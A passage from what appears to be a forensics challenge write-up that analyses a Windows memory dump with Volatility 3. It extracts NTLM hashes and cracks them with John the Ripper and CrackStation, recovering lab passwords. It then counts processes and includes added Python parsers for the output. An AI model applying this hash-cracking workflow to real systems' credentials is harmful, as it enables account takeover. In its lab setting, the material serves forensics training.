<span style="color: white;">nakia:1003:aad3b435b51404eeaad3b435b51404ee:f1c216dcadb73b5960bbcdf03bf3bbe0</span>
<span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ cat hashdump.txt | </span><b><span style="color: #fcff01;">sed -e "s/\s/:/g;1,4d" > new_hashdump.txt</span></b></span>
</pre></div>
</div><div><br /></div><div><div>Above, I used <i>sed </i>to replace the spaces with "<i>:</i>" while at the same time, using <i>sed </i>to delete the first 4 lines. This makes the file cleaner for tools such as <i>hashcat</i> and <i>john</i>.</div><div><br /></div><div>Using <i>John </i>we see the passwords are:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">john --format=nt new_hashdump.txt</span></b></span>
<span style="color: white;">Created directory: /home/kali/.john</span>
<span style="color: white;">Using default input encoding: UTF-8</span>
<span style="color: white;">Loaded 6 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])</span>
<span style="color: white;">Warning: no OpenMP support for this hash type, consider --fork=4</span>
<span style="color: white;">Proceeding with single, rules:Single</span>
<span style="color: white;">Press 'q' or Ctrl-C to abort, almost any other key for status</span>
<span style="color: white;">Almost done: Processing the remaining buffered candidate passwords, if any.</span>
<span style="color: white;">Proceeding with wordlist:/usr/share/john/password.lst</span>
<span style="color: white;"> (Guest)</span>
<span style="color: white;"> (DefaultAccount)</span>
<b><span style="color: #fcff01;"><span>Testing1 (Administrator)</span>
<span>Testing1 (securitynik)</span></span></b>
<span style="color: white;">Proceeding with incremental:ASCII</span>
<span style="color: white;">4g 0:00:06:42 3/3 0.009944g/s 34234Kp/s 34234Kc/s 68468KC/s ccr2brim..ccr2br04</span>
<span style="color: white;">Use the "--show --format=NT" options to display all of the cracked passwords reliably</span>
<span style="color: white;">Session aborted</span>
</pre></div>
</div><div><br /></div><div><div>Alternatively, I could simply have extracted the NTLM hashes and submitted them to <a href="https://crackstation.net/">https://crackstation.net/</a></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat new_hashdump.txt | awk --field-separator=':' '{ print $4 }'</span>
<span style="color: white;">23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">33651ad684b9bfb2e11f422d80b16ceb</span>
<span style="color: white;">23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">f1c216dcadb73b5960bbcdf03bf3bbe0</span>
</pre></div>
</div><div><br /></div><div><div>These hashes can then be passed to CrackStation; see below:<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8x_P5Ql0XBPXGjymuBQscngUoHktbtCwvpqCmeb67Rxai5duNvk9luvxjrbLt0nugBcn8_TSUyyR8P9-yOIpZTha4R_Ih4TO5JEjCTwrEpWZulfKUJ9mwZMdbRP__ntNZMcCtJ71y1SpPwa4kqputrHHZjGwovKQS72pjP_WqJQsFYexp5iPUAz2djvg/s859/Crackstation%20-%20Raw%20Hashes.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="425" data-original-width="859" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8x_P5Ql0XBPXGjymuBQscngUoHktbtCwvpqCmeb67Rxai5duNvk9luvxjrbLt0nugBcn8_TSUyyR8P9-yOIpZTha4R_Ih4TO5JEjCTwrEpWZulfKUJ9mwZMdbRP__ntNZMcCtJ71y1SpPwa4kqputrHHZjGwovKQS72pjP_WqJQsFYexp5iPUAz2djvg/w400-h198/Crackstation%20-%20Raw%20Hashes.PNG" width="400" /></a></div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>Here we see the results of the cracked passwords:</div><div><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtiqLRHPDYGeEiXvqfI2MxPjcNzDGVJSj49a3jS8ZyzxK7SbCA78kRze5ZwKp4EgIzZaprH5AEajx0umAjv6nrdgpofwb3viVlfOuskdZ5_Uy2GfkUCMnsibNqGgYamiH72KE8RhOLj6rXLJDGjB5l6ieYnW1fzfGezPlloSh67awu5UTNCALZMmCQFaQ/s865/Crackstation%20-%20Hashes%20Cracked.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="683" data-original-width="865" height="316" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtiqLRHPDYGeEiXvqfI2MxPjcNzDGVJSj49a3jS8ZyzxK7SbCA78kRze5ZwKp4EgIzZaprH5AEajx0umAjv6nrdgpofwb3viVlfOuskdZ5_Uy2GfkUCMnsibNqGgYamiH72KE8RhOLj6rXLJDGjB5l6ieYnW1fzfGezPlloSh67awu5UTNCALZMmCQFaQ/w400-h316/Crackstation%20-%20Hashes%20Cracked.PNG" width="400" /></a></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><div>These can also further be confirmed via:<br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ john --show --format=nt new_hashdump.txt</span>
<span style="color: white;">Administrator:Testing1:500:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">DefaultAccount::503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">securitynik:Testing1:1001:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026</span>
</pre></div>
<br /><div>Q: What are the passwords for all users?</div><div>A: <i>Guest</i> and <i>DefaultAccount</i> seem to have blank passwords, while <i>Administrator</i> and <i>SecurityNik</i> have the password <i>Testing1</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> (Guest)</span>
<span style="color: white;"> (DefaultAccount)</span>
<span style="color: white;">Testing1 (Administrator)</span>
<span style="color: white;">Testing1 (securitynik)</span>
</pre></div>
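<div>Before (or instead of) cracking, the hash values alone already answer part of this question. The Python below is an added example, not part of this write-up or of Volatility: it parses the <i>hashdump</i> output shown above into the <i>user:rid:lmhash:nthash</i> lines <i>john</i> expects (treating a run of spaces or tabs as one separator, where the single <i>\s</i> in the <i>sed</i> above would emit doubled colons), then reports blank NT hashes, NT hashes shared between accounts, and any account still carrying an LM hash. The sample text is the hashdump output from this page.</div>

```python
"""Audit Volatility 3 windows.hashdump output before (or instead of) cracking it.

Added example, not part of the original write-up or of Volatility. It converts
the hashdump text into the user:rid:lmhash:nthash lines john expects and
reports what the hash values alone reveal: blank passwords, passwords shared
between accounts, and accounts that still store an LM hash.
"""
from collections import defaultdict

# Well-known constants: what each algorithm produces for an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash absent/disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of ""

# The hashdump output shown on this page (vol.py separates columns with tabs;
# only whitespace matters to the parser, so spaces are fine here).
SAMPLE_HASHDUMP = """\
Volatility 3 Framework 2.5.2
Progress:  100.00   PDB scanning finished
User  rid  lmhash  nthash

Administrator       500   aad3b435b51404eeaad3b435b51404ee  23e1d10001876b0078a9a779017fc026
Guest               501   aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount      503   aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount  504   aad3b435b51404eeaad3b435b51404ee  33651ad684b9bfb2e11f422d80b16ceb
securitynik         1001  aad3b435b51404eeaad3b435b51404ee  23e1d10001876b0078a9a779017fc026
nakia               1003  aad3b435b51404eeaad3b435b51404ee  f1c216dcadb73b5960bbcdf03bf3bbe0
"""


def _is_hash(s: str) -> bool:
    return len(s) == 32 and all(c in "0123456789abcdefABCDEF" for c in s)


def parse_hashdump(text: str) -> list[tuple[str, int, str, str]]:
    """Return (user, rid, lmhash, nthash) rows.

    Banner, progress and header lines are dropped because they do not look
    like <name> <decimal rid> <32 hex> <32 hex>. A run of spaces or tabs is
    one separator, which is exactly where 'sed s/\\s/:/g' would emit '::'.
    """
    rows = []
    for line in text.splitlines():
        tok = line.split()
        if len(tok) != 4 or not tok[1].isdigit():
            continue
        user, rid, lm, nt = tok
        if not (_is_hash(lm) and _is_hash(nt)):
            continue
        rows.append((user, int(rid), lm.lower(), nt.lower()))
    return rows


def to_pwdump(rows) -> str:
    """One user:rid:lmhash:nthash line per account, the layout john --format=nt reads."""
    return "".join(f"{u}:{rid}:{lm}:{nt}\n" for u, rid, lm, nt in rows)


def blank_password_accounts(rows) -> list[str]:
    """Accounts whose NT hash is the hash of the empty string: nothing to crack."""
    return [u for u, _, _, nt in rows if nt == EMPTY_NT]


def shared_password_groups(rows) -> list[list[str]]:
    """NT hashes are unsalted, so identical hashes mean identical passwords."""
    by_nt = defaultdict(list)
    for u, _, _, nt in rows:
        if nt != EMPTY_NT:
            by_nt[nt].append(u)
    return [users for users in by_nt.values() if len(users) > 1]


def lm_hash_present(rows) -> list[str]:
    """Accounts still storing a real LM hash (the legacy format should be disabled)."""
    return [u for u, _, lm, _ in rows if lm != EMPTY_LM]


if __name__ == "__main__":
    rows = parse_hashdump(SAMPLE_HASHDUMP)
    print(to_pwdump(rows), end="")
    print("blank passwords:", blank_password_accounts(rows))
    print("shared passwords:", shared_password_groups(rows))
    print("LM hash present:", lm_hash_present(rows))
```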
</div><div><br /></div><div><div>I was unable to determine the password for the user "<i>Nakia</i>"</div><div><br /></div><div>With Creds out of the way, let's move on.</div><div><br /></div><div>Let's start this process (pun intended :-D ) off by looking at the processes.</div><div><br /></div><div>I start this off by writing the <i>pslist </i>information to a file and to the screen.</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.pslist.PsList</span></b><span style="color: white;"> </span><b><span style="color: #fcff01;">> pslist.txt</span></b></span>
<span style="color: white;">Progress: 100.00 PDB scanning finished</span>
</pre></div>
</div></div></div><div><br /></div><div><div>Confirm the file was created: </div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ ls pslist.txt</span>
<span style="color: white;">pslist.txt</span>
</pre></div>
</div><div><br /></div><div><div>With this in place, time for some questions.</div><div><br /></div><div><b>Q: </b>How many unique processes (based on names) have one (1) occurrence?</div><div><b>A: </b>There are 49 processes with 1 occurrence:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pslist.txt | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | grep --perl-regexp '\s+?1\s+' | wc --lines</span>
<span style="color: white;">49</span>
</pre></div>
</div><div><br /></div><div><div>Q: How many unique processes, based on names, were seen at the time of this memory capture?</div><div>A: There were 68 unique processes based on their names:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pslist.txt | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines</span>
<span style="color: white;">68</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> How many active processes were running on the system when this capture was taken?</div><div><b>A:</b> 220. If you count just the lines returned you get 224; however, the header and blank lines at the top must be removed, which leaves 220.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pslist.txt | wc --lines</span>
<span style="color: white;">224</span>
<span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pslist.txt | sed '1,4d' | wc --lines</span>
<span style="color: white;">220</span>
</pre></div>
</div></div><div><br /></div><div><div><b>Q:</b> What are the top 10 processes based on occurrences/count? </div><div><b>A:</b> Here are the top 10 processes:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pslist.txt | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=10</span>
<span style="color: white;"> 78 svchost.exe</span>
<span style="color: white;"> 15 MoNotification</span>
<span style="color: white;"> 12 cmd.exe</span>
<span style="color: white;"> 12 chrome.exe</span>
<span style="color: white;"> 9 conhost.exe</span>
<span style="color: white;"> 8 msedge.exe</span>
<span style="color: white;"> 6 RuntimeBroker.</span>
<span style="color: white;"> 6 powershell.exe</span>
<span style="color: white;"> 4 OpenConsole.ex</span>
<span style="color: white;"> 3 dllhost.exe</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> What is the process with the most occurrences/count?</div><div><b>A:</b> The process seen most often was <i>svchost.exe</i>, with 78 occurrences.</div><div><br /></div><div><b>Q:</b> For the process that is seen the most, what is the "<i>CreateTime</i>" of the first and last instances seen of this process?</div><div><b>A:</b> Answer here:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pslist.txt | sed '1,4d;$d' | grep 'svchost.exe' | sed '2,77d'</span>
<span><span style="color: white;">884 696 svchost.exe 0xe78bf2c90080 19 - 0 False </span><b><span style="color: #fcff01;">2023-11-16 19:09:13.000000 </span></b><span style="color: white;"> N/A Disabled</span></span>
<span><span style="color: white;">2220 696 svchost.exe 0xe78bf70870c0 5 - 0 False </span><b><span style="color: #fcff01;">2023-11-16 23:56:45.000000</span></b><span style="color: white;"> N/A Disabled</span></span>
</pre></div>
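<div>Each of the <i>sed</i>/<i>awk</i> pipelines above re-derives the column layout of <i>pslist.txt</i>. As an added example (not part of the original write-up or of Volatility), the Python below parses the <i>pslist</i> text once into records and answers the same questions: total rows, unique names, names seen once, the most common names, and first/last <i>CreateTime</i> for a name. It also separates exited from live processes, counts children by PPID instead of grepping for a number that could match another column, and lists names that hit the 14-character display limit of <i>ImageFileName</i>. The excerpt is constructed from rows shown on this page, so its figures describe the excerpt, not the whole image.</div>

```python
"""Parse Volatility 3 windows.pslist text output and answer the counting questions.

Added example, not part of the original write-up or of Volatility. The excerpt
below is constructed from rows shown on this page, so the figures it yields
describe the excerpt only, not the full 220-process image.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed excerpt in the layout of pslist.txt: banner, progress line and
# header, then one row per process (vol.py uses tabs; any whitespace works here).
SAMPLE_PSLIST = """\
Volatility 3 Framework 2.5.2
Progress:  100.00   PDB scanning finished
PID  PPID  ImageFileName  Offset(V)  Threads  Handles  SessionId  Wow64  CreateTime  ExitTime  File output

884    696    svchost.exe     0xe78bf2c90080  19   -  0  False  2023-11-16 19:09:13.000000  N/A  Disabled
2220   696    svchost.exe     0xe78bf70870c0  5    -  0  False  2023-11-16 23:56:45.000000  N/A  Disabled
5556   696    svchost.exe     0xe78bf33a80c0  0    -  0  False  2023-11-16 19:12:58.000000  2023-11-16 19:13:04.000000  Disabled
4032   696    MsMpEng.exe     0xe78bf38b5080  14   -  0  False  2023-11-16 19:09:46.000000  N/A  Disabled
6804   884    RuntimeBroker.  0xe78bf4e2d080  9    -  1  False  2023-11-16 19:25:24.000000  N/A  Disabled
3224   884    dllhost.exe     0xe78bf49c2080  7    -  1  False  2023-11-16 19:25:02.000000  N/A  Disabled
10152  884    smartscreen.ex  0xe78bf707a080  6    -  1  False  2023-11-16 23:56:53.000000  N/A  Disabled
2992   1548   powershell.exe  0xe78bf3d6e0c0  0    -  0  False  2023-11-16 19:18:05.000000  2023-11-16 19:18:06.000000  Disabled
484    4776   MoNotification  0xe78bf46ef080  0    -  1  False  2023-11-16 19:30:34.000000  2023-11-16 19:54:19.000000  Disabled
1012   4776   MoNotification  0xe78bf51750c0  0    -  1  False  2023-11-16 19:54:18.000000  2023-11-16 19:54:19.000000  Disabled
9044   8100   mysqld.exe      0xe78bf4fa5080  30   -  1  False  2023-11-16 23:26:13.000000  N/A  Disabled
10008  8100   httpd.exe       0xe78bf6fb6080  1    -  1  False  2023-11-16 23:26:15.000000  N/A  Disabled
5088   10008  httpd.exe       0xe78bf61b9080  156  -  1  False  2023-11-16 23:26:16.000000  N/A  Disabled
"""


@dataclass
class Process:
    pid: int
    ppid: int
    name: str                 # ImageFileName: at most 14 visible characters
    offset: str
    threads: int
    handles: Optional[int]    # "-" when the plugin cannot read the handle table
    session: int
    wow64: bool
    create_time: str          # "YYYY-MM-DD HH:MM:SS.ffffff" sorts correctly as text
    exit_time: Optional[str]  # None while the process is alive ("N/A")


def parse_pslist(text: str) -> list[Process]:
    """Data rows are the only lines that start with a decimal PID."""
    procs = []
    for line in text.splitlines():
        tok = line.split()
        if not tok or not tok[0].isdigit():
            continue
        # CreateTime is two tokens; ExitTime is either "N/A" or two more tokens.
        exit_time = None if tok[10] == "N/A" else f"{tok[10]} {tok[11]}"
        procs.append(Process(
            pid=int(tok[0]), ppid=int(tok[1]), name=tok[2], offset=tok[3],
            threads=int(tok[4]), handles=None if tok[5] == "-" else int(tok[5]),
            session=int(tok[6]), wow64=(tok[7] == "True"),
            create_time=f"{tok[8]} {tok[9]}", exit_time=exit_time))
    return procs


def name_counts(procs) -> Counter:
    return Counter(p.name for p in procs)

def singleton_names(procs) -> list[str]:
    """Names seen exactly once (the 'count of 1' question, without a regex)."""
    return sorted(n for n, c in name_counts(procs).items() if c == 1)

def top_names(procs, n=10):
    return name_counts(procs).most_common(n)

def exited(procs) -> list[Process]:
    return [p for p in procs if p.exit_time is not None]

def active(procs) -> list[Process]:
    return [p for p in procs if p.exit_time is None]

def children_of(procs, pid: int) -> list[Process]:
    """Direct children by PPID; a grep for the number would also hit other columns."""
    return [p for p in procs if p.ppid == pid]

def first_last_create(procs, name: str):
    times = sorted(p.create_time for p in procs if p.name == name)
    return (times[0], times[-1]) if times else (None, None)

def maybe_truncated(procs) -> list[str]:
    """EPROCESS.ImageFileName is a 15-byte NUL-terminated field, so pslist shows at
    most 14 characters: 'smartscreen.ex' is cut, 'powershell.exe' merely fits.
    Treat this as a review list; a grep for a full file name misses the cut ones."""
    return sorted({p.name for p in procs if len(p.name) == 14})


if __name__ == "__main__":
    procs = parse_pslist(SAMPLE_PSLIST)
    print(len(procs), "processes,", len(name_counts(procs)), "unique names,",
          len(exited(procs)), "exited,", "top:", top_names(procs, 3))
    print("children of 884:", [p.pid for p in children_of(procs, 884)])
    print("svchost.exe first/last:", first_last_create(procs, "svchost.exe"))
    print("possibly truncated names:", maybe_truncated(procs))
```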
</div><div><br /></div><div><div><b>Q:</b> How many unique process names were seen active (not exited) at the time of this memory capture?</div><div><b>A:</b> 66<br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep "N/A" | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines
66</span>
</pre></div></div><div><br /></div><div><b>Q:</b> How many unique processes, based on their Process ID (PID), have exited?</div><div><b>A:</b> Based on PID, 23 unique processes have exited.</div></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep "N/A" --invert-match
Volatility 3 Framework 2.5.2
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output
5556 696 svchost.exe 0xe78bf33a80c0 0 - 0 False 2023-11-16 19:12:58.000000 2023-11-16 19:13:04.000000 Disabled
2992 1548 powershell.exe 0xe78bf3d6e0c0 0 - 0 False 2023-11-16 19:18:05.000000 2023-11-16 19:18:06.000000 Disabled
2252 2992 powershell.exe 0xe78bf435f0c0 0 - 0 False 2023-11-16 19:18:06.000000 2023-11-16 22:01:47.000000 Disabled
5708 1280 TabTip.exe 0xe78bf42321c0 0 - 1 False 2023-11-16 19:24:25.000000 2023-11-16 19:25:14.000000 Disabled
3040 768 userinit.exe 0xe78bf517f080 0 - 1 False 2023-11-16 19:24:46.000000 2023-11-16 19:25:17.000000 Disabled
7040 1100 msedge.exe 0xe78bf4e300c0 0 - 1 False 2023-11-16 19:25:26.000000 2023-11-16 21:19:45.000000 Disabled
484 4776 MoNotification 0xe78bf46ef080 0 - 1 False 2023-11-16 19:30:34.000000 2023-11-16 19:54:19.000000 Disabled
1012 4776 MoNotification 0xe78bf51750c0 0 - 1 False 2023-11-16 19:54:18.000000 2023-11-16 19:54:19.000000 Disabled
3148 4776 MoNotification 0xe78bf428c0c0 0 - 1 False 2023-11-16 19:54:19.000000 2023-11-16 19:54:37.000000 Disabled
2816 4776 MoNotification 0xe78bf4fc30c0 0 - 1 False 2023-11-16 19:54:37.000000 2023-11-16 20:26:01.000000 Disabled
4908 4776 MoNotification 0xe78bf4ec9080 0 - 1 False 2023-11-16 20:26:00.000000 2023-11-16 20:26:01.000000 Disabled
6168 4776 MoNotification 0xe78bf32c4080 0 - 1 False 2023-11-16 20:26:01.000000 2023-11-16 20:27:32.000000 Disabled
5348 4776 MoNotification 0xe78bf4ebe080 0 - 1 False 2023-11-16 20:27:32.000000 2023-11-16 21:34:07.000000 Disabled
8848 4776 MoNotification 0xe78bf689b0c0 0 - 1 False 2023-11-16 21:34:06.000000 2023-11-16 21:34:07.000000 Disabled
7200 4776 MoNotification 0xe78bf62da0c0 0 - 1 False 2023-11-16 21:34:07.000000 2023-11-16 21:35:30.000000 Disabled
4116 4776 MoNotification 0xe78bf61950c0 0 - 1 False 2023-11-16 21:35:30.000000 2023-11-16 22:55:10.000000 Disabled
488 4000 VMwareResoluti 0xe78bf2b65080 0 - 1 False 2023-11-16 21:37:30.000000 2023-11-16 21:37:31.000000 Disabled
5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000 Disabled
4120 5508 powershell.exe 0xe78bf6961080 0 - 0 False 2023-11-16 22:08:06.000000 2023-11-16 22:08:31.000000 Disabled
2860 4776 MoNotification 0xe78bf671b0c0 0 - 1 False 2023-11-16 22:55:10.000000 2023-11-16 22:55:10.000000 Disabled
5424 4776 MoNotification 0xe78bf62ec0c0 0 - 1 False 2023-11-16 22:55:10.000000 2023-11-16 22:56:41.000000 Disabled
6764 4776 MoNotification 0xe78bf8e9c080 0 - 1 False 2023-11-16 22:56:41.000000 2023-11-16 23:56:45.000000 Disabled
2752 4776 MoNotification 0xe78bf67170c0 0 - 1 False 2023-11-16 23:56:44.000000 2023-11-16 23:56:45.000000 Disabled</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div><b>Q:</b> How many unique process names belong to processes that have exited?</div><div><b>A:</b> Based on process names, there were 8 unique names among the processes which have exited.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep "N/A" --invert-match | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort --unique | wc --lines
8</span>
</pre></div></div><div><br /></div></div><div>These are the unique processes.</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep "N/A" --invert-match | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort --unique
cmd.exe
MoNotification
msedge.exe
powershell.exe
svchost.exe
TabTip.exe
userinit.exe
VMwareResoluti</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What Endpoint Detection and Response (EDR) Mechanism was installed on this system at the time of taking this memory capture?</div><div><b>A:</b> Microsoft Defender</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep --ignore-case "MSMp"
4032 696 </span><b><span style="color: #fcff01;">MsMpEng.exe</span></b><span style="color: white;"> 0xe78bf38b5080 14 - 0 False 2023-11-16 19:09:46.000000 N/A Disabled</span>
